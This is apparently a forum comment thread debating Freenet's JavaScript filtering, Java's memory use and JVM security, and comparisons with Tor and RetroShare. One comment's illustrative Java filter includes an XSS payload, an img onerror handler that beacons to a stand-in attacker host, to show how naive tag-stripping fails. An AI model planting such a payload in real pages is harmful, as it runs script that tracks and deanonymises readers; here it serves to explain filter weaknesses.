I'm a fan of Freenet, but it has some core (and extremely longstanding!) usability issues that Tor has proven are unforced errors.
The restriction on JavaScript is the biggest one. The complete inability to run server-side code in a trusted context makes JS more necessary on Freenet than on the HTTP web; its absence makes developing a useful Freenet site extremely difficult. It pushes interesting Freenet projects to be deployed as local applications instead (which need auto-update to be practical). That amounts to placing absolute trust in unknown providers, which is vastly worse than running untrusted JavaScript. It also makes maintaining parallel Freenet and HTTP sites impractical (when only reader-side anonymity is needed), something Tor got right the first time.
Secondly, Freenet's JavaScript exclusion relies entirely on filtering code that's specific to Freenet and thus nowhere near as battle-hardened as browser JS engines. You don't need a Chrome zero-day to circumvent Freenet's reader anonymity; you just need to find an edge case in its filtering code, measured against the moving target of a self-updating browser.
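To make that concrete, here's a toy illustration of why blacklist-style filtering is so fragile. This is a deliberately naive example I made up for the sake of argument, not Freenet's actual filter (which I understand to be whitelist-based and much smarter):

```java
// Hypothetical, deliberately naive filter -- NOT Freenet's real code.
// Strips <script> tags with a regex and calls it a day.
import java.util.regex.Pattern;

public class NaiveFilter {
    private static final Pattern SCRIPT = Pattern.compile(
            "<script[^>]*>.*?</script>",
            Pattern.CASE_INSENSITIVE | Pattern.DOTALL);

    static String filter(String html) {
        return SCRIPT.matcher(html).replaceAll("");
    }

    public static void main(String[] args) {
        // The obvious case is caught:
        System.out.println(filter("<script>alert(1)</script>"));
        // But script in an event-handler attribute sails straight through,
        // and a browser will happily execute it, phoning home past the filter:
        System.out.println(filter(
                "<img src=x onerror=\"new Image().src='http://attacker.example/beacon'\">"));
    }
}
```

A real filter is far more careful than this, but the arms race has the same shape: the filter has to anticipate every way a browser might execute content, and self-updating browsers keep adding new ways.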
Freenet's core feature of anonymous distributed hosting (as opposed to just Tor's distributed proxying and BitTorrent's bandwidth sharing) is still a relevant technological frontier that's long overdue to see the light of day, but that's not going to happen until the project stops tilting at windmills on some of its crazier technical decisions.
Edit: While I'm complaining, I'm unclear on the real-world threat model that the friend-to-friend Darknet is supposed to protect against. Proving out that globally routable friend networks a la "The Crying of Lot 49" actually function is a neat scientific accomplishment, but it does nothing but help the Global Passive Attacker, and it probably makes things easier for more mundane threats too.
Agreed. Not the language itself, but the way the runtime operates. One simply does not build reliable, fundamental abstractions on top of sufficiently suboptimal ones and expect things to work long-term.
All the abstractions you build will eventually go over x86 bytecode instructions. And those aren't pretty, let me tell you.
The truth is that there is nothing important wrong with Java, and everything important wrong with Java programmers, which causes people like you to say things like that.
I guess you aren't aware of the dozens of 0-day exploits against the JVM that were released last year? Since Oracle took over, Java's security model has looked like Swiss cheese, Oracle's responsiveness to security flaws has been slow, and the fixes have introduced even more security flaws.
The problems weren't with the Java applet executor; they were with the JVM. Java Web Start and the JVM security model are where most of the 0-day exploits came from. Neither of these has anything to do with applets.
What are these magical "x86 bytecode instructions"? That phrasing itself means nothing. Are you sure you know what you are talking about?
I personally object on principle to anything that is non-optimal by design, because everything built on top of it has to carry the penalties of that design. Everyone suffers the tradeoffs.
Currently running Freenet/Tor/I2P on a VM (KVM) with 1.5GB RAM allocated to it. According to htop, java (Freenet and I2P) is using 985MB. Tor is using approximately 40MB.
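For what it's worth, the htop number isn't all live data: the JVM holds on to heap it has grown into, up to the -Xmx ceiling, so resident memory overstates what Freenet/I2P are actually keeping alive. A quick sketch using the standard java.lang.Runtime API (the class name is mine) shows the difference from inside the JVM:

```java
// Minimal sketch with the standard java.lang.Runtime API; class name is mine.
// Prints committed heap vs. heap actually holding live objects.
public class HeapReport {
    public static void main(String[] args) {
        Runtime rt = Runtime.getRuntime();
        long mb = 1024 * 1024;
        // Heap the JVM has committed so far (creeps toward the -Xmx ceiling)
        System.out.println("committed: " + rt.totalMemory() / mb + " MB");
        // Hard upper bound, set with the -Xmx command-line flag
        System.out.println("max:       " + rt.maxMemory() / mb + " MB");
        // Committed minus free = heap actually occupied by live objects
        long used = (rt.totalMemory() - rt.freeMemory()) / mb;
        System.out.println("in use:    " + used + " MB");
    }
}
```

A smaller -Xmx would shrink the resident footprint at the cost of more GC churn; whether Freenet stays usable under a tighter cap is another question.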
The day someone takes up a rewrite of Freenet in C/C++ is the day I send money to the project.
I really like it when I go to download some new app and see that there's a simple executable .jar I can get. They are still bloated and slow though... it just so happens that we have workstations with i7s and 32GB of RAM.
We finally caught up to where Java is reasonable, yay!
What do you mean when you say that Firefox is "a Java Internet browser"? Firefox wasn't written in Java. Java code only runs in Firefox through the use of the Java plugin, just like any other browser.
RetroShare isn't similar to Freenet at all. Please read the design docs and white papers for both projects in full. What I really like about Freenet & GNUnet is the built-in, efficient distributed caching of data: even small sites won't go down when there's a global rush.
RetroShare is currently the best example of Zawinski's Law[1] one could ask for: we needed a p2p/f2f daemon we could run voip/chat/messaging/file sharing on top of. Instead, we're given this bloated hunk of 1998-era software design that tries to do everything for us, and does all of it poorly.
They are comparing static sites on Freenet with dynamic hidden services on Tor. Sure, hosting many hidden services with the same provider was dumb, but we're talking apples and oranges here.